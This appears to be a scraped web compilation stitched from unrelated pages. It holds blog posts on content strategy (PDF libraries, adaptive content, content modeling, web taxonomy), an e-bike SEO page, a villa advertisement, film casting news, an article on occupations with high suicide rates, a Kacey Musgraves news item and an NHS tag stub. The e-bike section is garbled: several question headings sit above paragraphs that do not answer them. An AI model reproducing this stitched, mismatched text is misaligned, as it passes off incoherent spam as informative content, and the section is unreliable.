This is web content that was authored in MS Word, converted to portable document format (PDF) files, and then uploaded to the website, rather than loading it into a content management system (CMS) as text and images. PDF document libraries sprawl insidiously across the internet landscape, trapping living, breathing content in their depths, ossifying into solid rock—unusable, un-reusable—until some content strategist chips away the asphalt to discover the bones of content that is probably extinct, or at least years out of date.
I understand how these PDF libraries are created and why. Really, I do. It’s easier to have content owners whack up content however they want, then just toss the PDFs online, rather than spend the time to consider the content carefully, giving it the time, attention, and respect it deserves.
Let me offer, though, some reasons for helping to pull the poor, thrashing, doomed content back out of the tar.
“Oh, PDFs are searchable, so it’s OK to dump…er…upload them.”
It’s true. Adobe over the years has made provision for lots and lots of embedded metadata, so it’s easier to find them. But while search engines can index PDFs so that they can be found, the real human beings who are searching for that content cannot scan them to see whether it’s the content they’re seeking without opening them. Don’t make your visitors become content excavators. Don’t make them open that PDF to skim it.
“But this is how I want it to look.”
It’s true. There are many times when our designers spend hours creating beautiful, high-end, printed publications. That’s good. That’s their art and craft. But creating print-ready publications does not release us from the responsibility of making all that content directly accessible as html text and images. You can certainly make BOTH available, as indeed you should.
“We’ll just make a content type for PDFs.”
It’s true. It is indeed important to have content types to represent files in libraries, ready for download. They need to make their metadata available to the CMS, so that appropriate related files can be offered up alongside other primary content. But when text and image content are caught in the PDF tar, their own content type is masked. Unless the content is pulled from the PDF, your CMS cannot manage the true content types correctly. Files of the “PDF” type will be indistinguishable, one from another, all sticky and black as they are.
“This is how we got it from the content owner, so that’s how we’re going to publish it.”
It’s true. Content owners own their content. (I know, it sounds silly.) They spend a lot of time, laboring in MS Word to format it just so. When they hand over their œuvre to you for posting, you’re stuck between appreciation of their efforts, compassion that they spent so much time on it, and horror that it’s going to require stripping it of all its format before it can be reformatted for the CMS. If you have content owners who are open to the liberation of “just give me the text,” then you can make their lives (and yours) easier, and the content escapes oblivion. If not, then although it means a longer road, reformatting the content will take you safely around the tar.
PDFs of unstructured documents can never be reused as structured content.
Finally, the most important reason for eschewing the PDF is that when content owners create MS Word documents, they almost never—like, ever!—understand the difference between “format” and “structure.” So they skip blithely through their document, clicking bold here, italic there, and changing fonts and colors according to how they think it will communicate their intentions, without capturing the meaning of those formatting changes in the structure of the content. If unstructured documents are then converted to PDFs and put online, they will be unusable as structured content, and meaningless to semantic search.
Time to Drain the Tar Pits
The simplest guidance you can give your clients, content owners, and stakeholders is to reserve PDF files for content that has been designed to be printed, and then only as a supplement to the live web content. You can probably get away will making PDFs available for content that no one will ever really need, like legal reports and other specific content types that will actually be easier to consume as printed documents rather than as web documents. Even in those circumstances, abstracts of that content should be posted, so that content consumers will be able to preview the documents before committing themselves to downloading them.
Adaptive Content: Our primary platform is burning; Time to jump.
by: rsgracey - June 12th, 2012 Filed under: Content Modeling, Content Strategy
We were honored at our last enterprise web developers’ conference to welcome Karen McGrane (@karenmcgrane) as our first keynote presenter. I have known Karen since we were both attendees of the “Content Strategy Consortium” at the 2009 Information Architecture Summit, and every encounter, every opportunity to listen to her speak, has been an inspiration to me.
Currently, Karen is giving a talk called “Adapting Ourselves to Adaptive Content,” and many of you may have heard her give it as the closing keynote at the Content Strategy Confab 2012 in Minneapolis. For any who haven’t had the pleasure yet, I’d like to review my principal revelations from that marvelous talk.
As our conference theme was vaguely articulated as “mobile,” she addressed herself to the issues of how to ensure that our content plays well, when we have no idea on what sort of device or in what context people may be encountering and consuming our content. But more important than the “how-to” aspects, my main revelation from the talk was how hard it can be for us as content designers and producers to let go of control—to confront and release the idea that our content has a “primary platform,” from which are derived all the formats for the devices and contexts we can imagine and plan for.
Abandoning the “primary platform”
I think the greatest insight I gained from Karen’s adaptive content talk is the idea that historically, all content has been designed and created for a “primary platform,” whose format is well understood. After its initial publication, it must then be reformatted to meet the design realities of any other contexts in which it is to appear.
For example, a slick sales brochure is created as a print document. In this case, the paper page is its “primary platform.” The designer kerns and justifies, styles and tweaks, until a beautiful product has emerged, ready to be handed out at tradeshows or mailed out to prospective donors.
Then someone says, “Hey, we need to get this ‘up on the web,’” and it is (implicitly or explicitly) understood that it should look as much like the printed piece as possible. The brochure is then exported as a PDF, and on some webpage, there is a link to download it.
But then, someone notices that the brochure PDF doesn’t look right on a phone…or a tablet. The display is either too small to read, or it doesn’t rotate well from portrait to landscape. It is handed back to the designers to be “fixed.”
The design team then becomes trapped in an inescapable cycle of creating multiple formats for every content piece, first for print, then for web, then for mobile devices. The need to rework the design for different contexts multiplies the time and cost of creating the content.
Some designers, feeling the pain of the rework process, recommend “designing for mobile first.” But then “mobile” becomes the “primary platform,” and the need for redesigning and reformatting content for other contexts remains.
Responsive Design: Teaching your design to adapt to its surroundings
Ethan Marcotte has sounded the call for “ Responsive Web Design ,” which from the visual designer’s perspective, offers a solid approach to putting intelligence into the CSS code, so that a design “knows” what device is calling it, and it can respond with the appropriate styling and format to match. By incorporating media queries and relative measures, web designers can teach their designs to accommodate a wide range of devices and formats. This brilliant work is revolutionizing the way we make design decisions and write code.
But if “responsive design” is about teaching the design know the device, “adaptive content,” according to Karen, is about teaching the content to know itself.
γνῶθι σαυτόν: Teaching your content to “know itself”
“Designers are control freaks,” admits Jared Ponchot at Lullabot in a blog post on responsive design. News Flash: So are writers, editors, and other content producers. “Hello. I’m Stephen, and I’m a content control freak.” I can only say that self-knowledge is the first step toward wisdom.
But it’s time to admit that we’re powerless over technology and its users. We can never know enough about our users, their needs, or their devices—let alone how devices will have changed by next year—to teach our content how to adapt to them. Instead, we must build into the content solid information about its structure and meaning, so that we can allow others to make decisions about how it should look and behave.
(It’s probably more like parenting than we care to admit: Parents do their best to rear their children and help them to know themselves, but eventually they must let go and let them be their own adults. They have to stop following them around to make decisions for them. I can hear my mother saying, “But you’ll always be my content…!”)
Karen points to National Public Radio’s “content API,” which streams no design information, but only content and its structure. Because the API doesn’t know anything about devices, devices can present the content according to their native styling instructions. The NPR website has templates to style the content for the main platforms, but application developers can also write native applications to style the content for their particular target devices and contexts.As technology changes, so will the styling, but the content remains well-structured and ready for anything.
Design can only be “responsive” when content is “adaptive.”
On reflection, I think the primary message of Karen’s talk is that we’ll get the most out of “responsive” design when we learn to make our content “adaptive.” We’ve long said that structure and presentation—content and design—should be independent of one another. Well, folks, it looks like this time we have to mean it. It will require both disciplines—and facing down our control needs—to provide rich content that plays well across the dizzying array of platforms.
Time for a deep breath. Time to jump…
Adapting Ourselves to Adaptive Content
View more presentations from Karen McGrane
Content Modeling is more than “fields”
by: rsgracey - May 4th, 2011 Filed under: Content Management, Content Modeling, Content Strategy 2 Comments
When content management folk talk about “content modeling,” they are usually referring to the process of building templates for a CMS. Besides the Content Management Bible by Bob Boiko, which is a great place to see how a lot of CMSes work, I found a series of excellent overviews of the discipline by Deane Barker of Blend Interactive, Inc., at Gadgetopia.
Barker says:
“Content modeling is the process of converting logical content concepts into content types, attributes, and datatypes.”
In academia, you can find inscrutably technical research on content modeling as the process of identifying the structure of documents algorithmically. (This gem from MIT scintillates! Content Modeling Using Latent Permutations, by Chen, Branavan, Barzilay, and Karger. 2009.)
But if that’s what is meant by “content modeling,” then there are essential aspects missing.
As content strategists, we face this technical view all the time, which I believe is descended from IT disciplines like “data modeling” for database design. We come on the scene talking about content purpose and process, and technologists ask us for template requirements, metadata fields, and data types. In these days of XML standards and the quest for the Holy Semantic Web, we find ourselves pushed into the thick of technical specification before we’ve had a chance to imagine what the content is supposed to be and do, let alone how it should be structured.
Returning to art
In my view, we’d be nearer the truth of “modeling” if we took our cues from other disciplines:
When a painter undertakes a monumental work of art, she doesn’t just run in with paintbrushes blazing. She sketches from life. She does études. She makes early decisions about what works and what doesn’t.
Murals often begin as drawings in miniature, which are enlarged to scale, then transferred to the wall.
The sculptor “models” in clay before casting in bronze.
The industrial designer creates digital “models” before production.
Developers create prototypes (just “models” by another name) before turning the coders loose.
Models serve as demonstration and instruction to the producers, the assistants, and the artists themselves. They remind and guide. They provide format and boundaries to inspire greater creativity.
Content must be modeled in this creative sense, as well as in the technical sense.
Some suggestions for modeling
Banish the “basic page” from your content types. The “webpage” is the content parallel to the “miscellaneous” category in information architecture. Far from being your standard content type, it should be your very last resort.
Ask the simple questions. Why are we creating this content form? What are people supposed to do with it? What does that mean for the other kinds of content we produce? How can they be combined into content “super-types?”
Do some content studies and sketches. Before you define technical requirements, spend time whipping up some real content to see how it behaves in your domain. If you already have content, gauge the consistency of its form from one piece to the next.
Test the usability of your content. Like a user interface, you should see whether people can actually use your content in the way it was intended. Do they get from it what you hoped they would?
Define the “rules” for each content type. You’re establishing conventions for the content creators, so they know what they’re doing, and so they can do it consistently over time.
By modeling your content in the artistic sense—by setting the forms and boundaries even before the content is “designed”—all the technical content management exigencies, like “fields” and “data types,” are set in their proper perspective. Templates are simply the mold into which your material is poured and out of which the sculpture emerges, fully formed.
Taxonomy: A “Disambiguation”
by: rsgracey - June 18th, 2010 Filed under: Content Modeling, Content Strategy, Information Architecture 8 Comments
I was not able to attend the several workshops on “taxonomy” at the recent WebContent2010 conference (#wcconf) in Chicago: Tough choices were made. Yet I think I got a lot out of those workshops because of the seriously faithful tweeting coming out of them, and when I said so to some new friends, they almost all said, “How? I didn’t understand any of it…overwhelming.” I replied that when you follow a tweetstream, you only see what people understand, already interpreted for you. (Which is a recommendation, really, to follow conferences you can’t attend: Done well, the tweets will give you at least the essential points.)
Amid the summary tweets of the workshops’ content, however, I saw comments such as these:
“A workshop and a session on taxonomy and I’m still confused. Is it just me? #wcconf” – @EvanKittleton
“Ouch. My head hurts. Taxonomy not an easy beast to wrestle. #wcconf” – @cc_holland
A lot of the confusion centered on how the idea of taxonomy relates to—and differs from—other elements of Information Architecture, such as sitemaps and navigation. Are they the same thing? Is it just your metadata?
With the guidance of my best-bud colleague Becky Bristol as technical reviewer (@paintingblue) I’m going to try to “disambiguate” it, that is, to explain and clarify.
Disclaimer: I’m an explainer, not a taxonomist, so if you’d like to help with the definition, please by all means chime in.
The Roots of Taxonomy
“Taxonomy” is an ancient scientific practice. It means to find names for things. In naming things, you try to figure out how sets of things are related to one another, so that each, unique item will not only have a unique name, but also a reference to the others to which it relates.
Taxonomy creates a hierarchy of inheritance, from general down to specific and back: A giant tree, on which there is a unique place for every item, like the leaves at the ends of twigs at the ends of branches connected to a trunk and running deep into the earth.
In order to build a taxonomy in the scientific sense, you have to create a framework that tells you how to name a thing. This is the “schema.” The most famous schema was created by Carl Linnaeus, an 18th Century Swedish botanist, to categorize and name life on Earth. It has eight, major taxonomic ranks:
Domain -> Kingdom -> Phylum (botany)/Division (zoology) -> Class -> Order -> Family -> Genus -> Species
If you’re REALLY geeky, you can lay it out in Latin:
Regio -> Regnum -> Phylum/Divisio -> Classis -> Ordo -> Familia -> Genus -> Species
There are only certain terms you can put into those fields. Imagine drop-down boxes from which you MUST choose. Let’s try it on ourselves, humans:
Domain Kingdom Division Class Order Family Genus Species
Eukarya Animalia Chordata Mammalia Primates Hominidae Homo H. Sapiens
When the terms don’t apply at a certain point, then you get to pick a new term, which at that point, creates a new branch. If you find a new item in nature, something that hasn’t been named before, you get to name it yourself, but you will use the same set of terms down the tree as far as you can to demonstrate your new species’s relationship to all other life.
Taken altogether, this classification system becomes the official way of understanding the whole world of animals, plants, and bacteria. Taxonomy is powerful because it is universally adopted: You could try to work out a new system, but then you’d have to explain it to everyone and get buy-in for it to mean anything to anyone else but you. It is at this point that we make the transition to the Web…
Taxonomy on the Web
Now at some point, the word “taxonomy” was appropriated by information architects to talk about web content. When one discipline borrows from another’s, the meaning and use of the term can change significantly, and so “taxonomy” doesn’t mean to the web professional quite what it means to the biologist.
A website’s taxonomy describes how all the content relates to each other. Through its rigidly controlled network of meaning, there is a way to say with confidence:
“Item X and Item Y are in the same group. When you look at Item X, you may also be interested in Item Y.”
We take this kind of connection for granted these days because Amazon and other e-commerce giants have made such ubiquitous and successful use of taxonomy to sell related things, but it’s really quite difficult to establish those kinds of relationships in your content without taxonomy.
In summary to this point, then, “taxonomy” on a website is a classification system that maps all your content to other content. Taxonomy on a website creates a scaffold that holds your content together.
Not one taxonomy, but many
It gets a little more complicated from here. Whereas in a biological taxonomy, we’re dealing with only one dimension of relationship, the ultimate relationship of one species to another through its name, on a website, there can be many classification systems to govern the relationship of content along many dimensions.
Let’s take with a clothing retailer. The most basic taxonomy would divide the products into groups of “kind” to answer the question, “What article of clothing is this?”
Clothing for the upper body
Clothing for the legs
Culottes (really a hybrid)
So far, so good. We have a system for identifying items by basic type. But that’s not so good for sales.
There will be, then, additional taxonomies to build up a multidimensional system that organizes products into classes: For women or men, girls or boys; for casual, work or formal contexts; for outdoor or indoor; by color; by season; by ethnic origin; and so on, and so on…
But that’s just the products. There will be other content that accompanies these products, and all that content must also be organized into categories.
“How to” content might include tieing neckties, caring for leather, assembling an ensemble for an evening out in Paris.
“About us” content might go through all the ways that this company works for environmental activism.
Product information might include stories about where the materials came from, or who made them.
The taxonomy must account for all these dimensions of content description and classification, so that when you pull up the product page for that pair of shoes you’re considering, you also can see:
What other colors are available?
What other shoes are in its class?
How do you care for them?
What accessories would complete your outfit?
How have other customers worn this item? (From their photos)
How long it would take to get them if you clicked the button right now…?
Taxonomy implemented through metadata
All this work of understanding the interrelationship of content has a specific and practical end: Metadata.
It is beyond the scope of this article to explain the process of developing taxonomic systems and how they are then translated into metdata for your web content. It is crucial, however, to recognize that having a clear, controlled system of metadata, which is then meticulously and consistently connected to your content, is the only way to ensure that your search and coordinated applications serve up the content the user expects, in the language the user expects, in combinations that make sense to the user.
Rich, interactive experiences require taxonomy
Creating rich internet applications (RIAs) is partly about the technology to evaluate and serve up all these connections, but it is impossible without care, design, and maintenance of your content’s taxonomy.
Again, unlike our scientific counterparts, there can be no, single, universal taxonomy for web content because each content domain has its own context of purpose, vocabulary, and peculiarity. There are commercially available taxonomic systems to get you started, but they all have to be evaluated for your specific purpose, and there will always be adaptation of the metadata.
Taxonomy, Navigation, and Sitemaps
A lot of the confusion in the workshops dealt with how a website’s taxonomy relates to the other aspects of its information architecture. As we explore these concepts, keep in mind that when done well, the taxonomy is completely invisible to the user. It just makes everything run smoothly.
The sitemap reveals the website’s overall organization. Every bit of content on a website needs a primary “home.” Ultimately, when you reach a content item, you are (virtually, of course) in a particular location on the site. The information architect’s job is to choose from the infinite range of organizational possibilities to anchor the user experience, which then is the foundation for the richness that the taxonomy creates.
The sitemap probably will reflect some basic aspects of the taxonomy underlying the content, but when you consider the richness and complexity described above, any relation between the sitemap and the taxonomy will be loose.
Navigation is more closely related to the sitemap than to the taxonomy. The main navigation provides the user an organized path around the website, intended for browsing. Like the sitemap, it may reflect some aspects of the taxonomy, but it doesn’t have to.
The taxonomy will enable, however, the local navigation options through access points to content elsewhere on the site, reached through the relatedness of content.
IAs help you put it together!
It’s the job of information architects to work all these intricacies out. The skills for designing the taxonomy and associated metadata are extensive and precise. The content strategist helps to define the content domain and the language that will best represent it, but the IA will be able to build an organizational framework that links the content domain with the technical wizardry that serves up the user experience.
In conclusion, as my best-bud Becky says, “There is no right or wrong way of [creating taxonomy]. The trick is to come up with a taxonomy that works for your users.”
I hope that this article has helped to clarify the definition of taxonomy and its application. Please offer corrections, amplifications, and clarification. It’s a matter to wide importance, and we need to get it right!
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Ancheer has become an icon in electric bikes and this mountain bike has earned itself a spot as the best electric mountain bike to ever grace the market. The electric bike comes equipped with a 250 Wat motor and a 36-Volt removable battery that pushes this bike to the extreme. It has an amazing pedal assist functionality which makes it an excellent bike for outdoor and leisure riding.
Do You Need A License To Drive A Moped Under 50cc
The distance range of an electric mountain bike refers to the distance you can travel on a single battery charge given a specific set of circumstances. All of the e-bikes we tested have roughly the same battery storage capacity, except for the Bulls E-Stream, but external variables like rider weight, pedaling input, terrain, trail conditions, and weather conditions may all affect the length of time or distance that a battery charge will last. To compare the distance range of the models in our test we had the same tester take each of the bikes out in their highest support setting and do laps on a very steep paved hill until the batteries ran down from fully charged to completely dead. When we finished, we recorded the distance and vertical gain that each model was able to complete and easily, and objectively determined our winner.
Is A Road Bike Easier To Ride Than A Mountain Bike
Key to Ebike success is that it rides like a bike first and foremost. You ride it like it was meant to be ridden, impressive. I started riding an ebike (Levo) about 6 months ago (although nowhere near your skill level) and have never ridden so much during the week, enjoyed every ride so much and looked so forward to rides as I currently do. Great Vids mate, keep it up!
How Does A Motor Speed Controller Work
Bosch’s flagship mountain bike system uses a mini drive ring with internal gearing to send its power to the drivetrain. There’s some resistance in the system over 25km/h, but when you first press down on the pedals there’s an impressive surge of power, and it offers good support over a wide cadence range. Its size has an impact on the width of the cranks (the Q-factor) as well as the chainstay length of the frame, and it’s not the lightest system on the market at 4kg for the motor. On the other hand, Bosch is the most established player on the market, and its system has proven itself over many years.
Can Electric Scooters Get Wet
Descents on such a heavy bike are less fun. Getting the rear wheel off the ground on short notice, or whipping it around turns is very hard. I like to use my rear tire and brakes to steer—locking the brakes in tight corners at speed, then letting off and pedaling out. On very loose and exposed trails, using that approach on the Turbo Levo doesn't work, once the rear starts to loose traction, it’s just all over. Perhaps this could be combated with lower rear tire pressures; we were running 20 PSI.
Does Cycling Up Hills Get Easier
I found that by sticking it on 'Turbo' or 'Sport' mode (the upper 2 of the 4 electrical assistance levels) and leaving it in a middle gear, the Centros felt zippy when in full flight, but able to pull away from the lights with no problems. Less lazy riders than me might want to actually use the 10 gears, and will find that in the top gear, it's quite easy to push past the mandated 15.5mph electrical limit.
X-Treme Scooters Folding Electric Mountain E-Bike offers a comfortable ride with front and rear suspension. It is an ideal bike for the college students, campers, and anyone who wants a portable and lightweight mode of transportation. This E-bike works on a motor of 300 watts. The best thing about this bike is it allows you to fold it after reaching the destination. It gives you a speed of about 20 mph with a 7-speed Shimano tourney gears. You can adjust the seat according to your ease.
Pros versatile, fits water bottle, least e-bike looking, good battery life, low center of gravity Good controls, huge distance range, confidence inspiring at speed, good component spec Reasonably priced, good distance range, well rounded performance, solid component spec Smooth and consistent power output, modern geometry, Cushy suspension, digital display, meaty tires
How Far Can You Travel On A Electric Bike
Unlike the manual mountain bikes where you would have to fully rely on pedaling, electric mountain bikes depend on an electric charge. As expected, the bike has a battery, which often determines how far one can go on a single charge. A good electric mountain bike should have a good storage capacity. Although most mountain bikes have nearly the same battery storage capacity, it is not uncommon to find one that falls below par. It is also good to know how it performs and uses the battery under different weather conditions terrain and depending on the rider’s weight.
Can A Tubeless Tyre Burst
If you have your eye on an affordable electric bike, you’ll want to make sure that you get the most bang for your buck. Unless you plan on doing more manual pedaling than cruising, you’ll want a bike with a sufficient amount of power. Some bikes have lower watt motors, such as 250 to 300, while others offer more of a boost with 500 watts or more. Another factor for many consumers is whether the bike comes with certain features, such as lights, a water bottle cage, and a rear rack.
How Long Does Electric Bike Battery Last
Specifically, battery packs are made up from many cells: the lead acid ones are similar to those we use on our cars, while the lithium ones use the same technology as mobile phones. Apart from the chemical component inside their cells, the main feature that differentiates lead acid and lithium batteries is their size: the lead ones are heavy and have a short life (200 to 300 charge cycles), while the lithium ones are smaller and can last longer (from 500 to 1,000 charge cycles).
Are Electric Bikes Legal On The Road
With an electric mountain bike (or e-MTB) that gives you assistance up to 25kph, it’s possible to pack twice as much riding into the same amount of time. Those five great trails that you normally ride after work can now be ridden twice. That boring singletrack climb on your lunchtime loop suddenly becomes the highlight of your day. With the extra push from the motor it’s easy to double the distance covered, or do the same ride in half the time.
What Is The Fastest Electric Bicycle
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Luxury Villas Biarritz : This authentic luxury farmhouse is located just next to Biarritz, the famous French seaside retreat. The house sleeps 19 people. There are 9 bedrooms, each comes with a private bathroom with a shower. The main villa houses five bedrooms. Four of them are fitted with...
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PGA Awards: ‘1917’ Wins Best Picture; ‘Fleabag’, ‘Succession’ Top TV – The Complete Winners List
Rising Stars Johnny Flynn & Jessie Buckley In Talks For Michael Pearce’s ‘Beast’ – Cannes
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EXCLUSIVE: Highly rated director Michael Pearce is assembling a cast of up-and-coming talent for his feature directorial debut Beast. Johnny Flynn and Jessie Buckley are in advanced talks to star in the project. Beast is a love story trapped within a horror film; a dark fairytale about an emotionally isolated woman who comes under the spotlight of an island community when she falls in love with a man who is suspected of a series of brutal murders.
Agile Films and Stray Bear Films are co-producing, with Kristian Brodie, Lauren Dark and Ivana MacKinnon on-board as producers. The BFI and Film4 have developed and will finance.
Flynn previously starred opposite Kristen Stewart and Juliette Binoche in Clouds Of Sils Maria. He is also attached to play The Kinks co-founder Ray Davies in Julien Temple’s You Really Got Me. Buckley enjoyed a breakthrough performance as Marya Bolkonskaya in the epic BBC-TWC adaptation of Leo Tolstoy’s classic War And Peace. She is also set to appear in the Tom Hardy event TV series Taboo.
Pearce was previously BAFTA nominated for his short Keeping Up With The Joneses. He is repped by Independent Talent Group.
Flynn is repped by United Agents, CAA and Management 360. Buckley is repped by United Agents.
Jessie Buckley
Johnny Flynn
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9.5k Views 9 Comments by Alicia Rades May 19, 2014, 2:11 am inFacts, History, People
7 Jobs With the Highest Suicide Rates
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Everyone experiences job stress, but some careers are more stressful than others. These high-stress conditions can lead to increased rates of suicide within certain professions.
While there are numerous data sets available detailing how careers rank in regards to suicide rates, many careers consistently hit the top of the charts. Based on data compiled from divisions of the CDC, news outlets, and other data sets, we’ve put together a list of the professions that make it onto nearly every chart, listed in no particular order.
Want to live a long and happy life? Consider avoiding these career paths.
1. Physicians
Image via Flickr by Sweet Carolina Photography
Coming in at the number one spot most often, physicians really have it tough when it comes to job stress. The average population sees about a 1-2 percent rate of suicide whereas suicide accounts for 2-4 percent of all physician deaths, making them 1.87 times more likely to kill themselves than the average non-physician. Women physicians are 2.78 times more likely to kill themselves than the average female worker.
But is it really a physician’s job stress that leads to higher rates of suicide, or is it because they’re more efficient at it? Joshua D. Foster and IIan Shrira of Psychology Today theorize on several reasons physicians have a higher suicide rate than other professions.
Among these theories, they say that physicians are more likely to succeed in their suicide attempts because they know what drugs to use and at what dosage. In fact, physicians are four times more likely than others to use drugs as a means of suicide, not to mention that they have easy access to them.
Because there’s no difference in the rates of physician suicide between men and women, it’s also theorized that the job stress is simply higher, leading to depression. Since physicians are expected to be healthy, they may feel more reluctant to seek treatment. When they do seek help, therapists may believe they understand how to treat themselves because they’re doctors, greatly reducing their quality of care.
2. Dentists
Image via Flickr by Connor Lawless
Like physicians, dentists also work in high-stress environments, leading to a 1.67 increased likeliness of suicide among those in the profession. The reasons for this is due to many of the same factors associated with physician suicide.
One study found that dentists experience an increased rate of mental disorders due to their high-stress jobs, but they rarely receive treatment for it. Part of this is due to the absence of preventative measures taken by universities and professional organizations.
3. Finance Workers
Image via Flickr by Alan Cleaver
Finance workers, such as those working in financial service departments and sales occupations, are reportedly 1.51 times more likely to commit suicide than the average worker. By March 2014, the numbers were already up to 11 suicides in the financial sector.
Statistics show that there’s a correlation between financial worker suicide rate and the economy. When the economy is bad, suicide rates go up. Because people are constantly moving in and out of the industry, financial workers may feel they’re easily replaceable and don’t feel there’s a reason to stick around when things get tough.
4. Lawyers
Image via Flickr by reynermedia
Lawyers are also high on many lists, coming in as number four on a list reported by CNN.com. Unlike non-lawyers, lawyers are 3.6 times more likely to suffer from depression, and according to the National Occupational Mortality Surveillance, 1.33 times more likely to commit suicide than the average person.
In fact, eight state bar associations are so concerned about this issue that they’ve implemented mental health components into continuing education requirements. This high suicide rate is likely due to the high-stress nature of the job, including long hours, excessive client demands, and the nature of adversity in the job description.
CNN.com reports that lawyer depression can start as early as law school, stating that 40 percent of law students already suffer from depression by the time they graduate.
5. Police Officers
Image via Flickr by Tony Webster
While police officers don’t make the top of the charts for the average white male, it’s a profession souring in the charts for white women and black men. For white women, it’s the third riskiest profession for suicide, with a rate 2.03 times that of the average worker. It tops the charts as the number one riskiest profession for black men, where the suicide rate is 2.55 times higher than the average person, reports the National Occupational Mortality Surveillance.
Part of this is due to the stressful conditions police offers are put in, such as being faced with danger on a daily basis, being exposed to death and violence more than the average person, and adhering to high demands.
One study showed that police offers are twice as likely to display depressive symptoms and four times more likely to get less than six hours of sleep per night than the average employee. What’s more, the study found that working police offers were 8.4 times more likely to commit suicide than retired officers.
6. Real Estate Agents
Image via Flickr by MarkMoz12
According to the National Occupational Mortality Surveillance, real estate personnel are 1.38 times more likely to commit suicide than average. Part of this can be attributed to an uncertain paycheck, lack of benefits, and declining house values. Believe it or not, there’s also a risk involved in meeting strangers in vacant houses, which can put a lot of stress on agents and cause paranoia. In fact, in 2010, over one-third of on-the-job deaths for real-estate agents were murders.
7. Electricians
Image via Flickr by Wonderlane
A final profession high in suicide rates is electricians. White men are 1.31 times more likely to commit suicide, and black electricians are 1.78 times more likely than average to commit suicide. One study suggests that heightened and long-term exposure to electromagnetic fields could be a contributing factor. The theory is that the electromagnetic fields affect melatonin production, leading to higher rates of depression and therefore suicide. However, more research is needed to confirm this theory.
If you’re in one of these professions and have been feeling the job stress getting to you, read this article for further information on how to get help.
Written by Alicia Rades
Alicia Rades is a professional blogger and writer for hire who loves exploring new and exciting topics. Visit her at aliciarades.com to download her free blogging guide, 20 Questions to Ask Yourself Before Hitting Publish.
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Cloven Hooves says:
I cannot believe that the U.S. Soldier is not on the top 7 jobs list for highest suicide rate!
Alicia Rades says:
I thought the same thing! But honestly the data sets I looked at (coming from the National Occupational Mortality Surveillance) didn’t even have military personnel on the list. I’m aware that they have high rates of depression, but this doesn’t always result in suicide.
More suicides now than KIA in Iraq.
Jak Mehaughf says:
no no.. those are work-related accidents
Because the Soldier suicide rate counts veterans… = /
Monroe says:
I think military is not listed cause many soldiers, sailors, airmen, Marines, and coast guardsmen are no longer in the service when they finally do it. It’s a tradgedy.
anna nakanyala says:
Morning sir \ madam can please tel me 5 lead to suicide
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Kacey Musgraves Teases New Project On Earth Day
CelebritiesMusic
By Fahadullah Hussaini Last updated Apr 23, 2019
Grammy-winning country superstar, Kacey Musgraves has teased a dazzlingly eye-catching, curious teaser for an upcoming project this Earth Day. Musgraves traditionally accompanies her warm and enveloping music with appropriate video aesthetics, as it has been seen in the case with ‘Rainbow’. In February, Musgraves’s fourth album, Golden Hour, received the Grammy for best album – not just best country album, but best album period- a significant milestone in the evolution of the genre. If that wasn’t all, the queen of country crossovers had a tie with Childish Gambino for most trophies of the night by taking home four. The countless victories of her fourth studio album have inspired Musgraves to constantly strive for more success. The artist will soon perform at her sold-out Oh, What a World: Tour II. Similarly, her latest Twitter tease suggests that Musgraves has a music video for Oh, What A World coming up too.
Kacey Musgraves Announces New Project On Earth Day
While wishing everyone on Earth Day yesterday, Kacey Musgraves gave a reason to her fans to rejoice. Musgraves announced that she has been working on ‘something special’. Being generous enough, she even dropped a preview of her new project. Kacey Musgraves Music
Happy Earth Day! May you all feel the magic of this gorgeous planet we call home. Been working on somethin’ special with @trippyogi..here’s a little preview ✌? #OhWhatAWorld pic.twitter.com/yV5ATeVHid
— K A C E Y M U S G R A V E S (@KaceyMusgraves) April 22, 2019
‘Oh, What A World’ From The ‘Golden Hour’ Is A Song Close To Kacey Musgraves
Given the obvious hints and an even more obvious occasion, fans quickly picked up that the preview was indeed a nod to an upcoming ‘Oh, What A World’ music video. Out of the 13 tracks catalogued in the award-winning ‘Golden Hour’, Musgraves only chose Oh, What A World to headline her upcoming tour. Interestingly, that is not a track that she has a Grammy for. ‘Oh, What A World’, is definitely close to the soul, Musgraves had frigidly bared in the ‘Golden Hour’. And for that reason, Musgraves is probably honoring it with an exclusive music video. Kacey Musgraves Music
Designer Jeremy To Assist Musgraves In The Making Of Oh, What A World Music Video
The voiceless teaser strikes the audience’s attention with its stunning visuals. Kacey Musgraves has recruited the acclaimed designer Jeremy to craft abstract and thought evoking graphics for her upcoming project. The teaser suggests that Jeremy has successfully executed the task by filling in the video with his signature vistas in rosy hues.
‘Oh, What A World’ blends together the powerful writing and vocals of Musgraves and Daniel Tashian together. The 4-minute track is an absolute fan-favorite from the ‘Golden Hour’. And this might have also been a pressing reason for Kacey Musgraves to give the song a video of its own. Kacey Musgraves Music
Golden HourGrammysKacey MusgravesOhWhat A World
Fahadullah Hussaini 696 posts
Syed Fahadullah Hussaini is Dankanator’s TV critic and reporter. Fahad has written for platforms including Parhlo, Wonderful Engineering and Mangobaaz. Fahad’s work has also appeared on Dawn’s Young World, and on several Paparazzi issues.
Fahad views TV as a resource rather than a medium. Laden richly with an extensive medley of ideas, cultures, facts, and fables. The writer taps on TV’s new and returning presentations, and channels out every bit of news related to them, along with objectively (and subjectively) analyzing their substance.
Fahad is currently working on a short-stories collection, ‘Seven Colors Of Life’, which shall soon be available on his blog.
50 Cent Reminds Us What is Important on Easter
Game Of Thrones Season 8: Memes Are Coming for Episode 2
Grammys 2020 Nominations Announced and BTS Was Snubbed?
Katy Perry Praises Fellow Singer Kacey Musgraves
Where to watch 61st Grammy Awards of 2019
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Tag Archives: NHS Safe Staffing
Five Priorities for NHS and Social Care in 2017 (King’s Fund / BBC News / BMJ / Nuffield Trust)
Summary 2017 is going to be challenging for the NHS and social care, as the demand for care outstrips the supply of funding / resources. A King’s Fund briefing identifies five main priorities for the year ahead: Supporting new care … Continue reading →
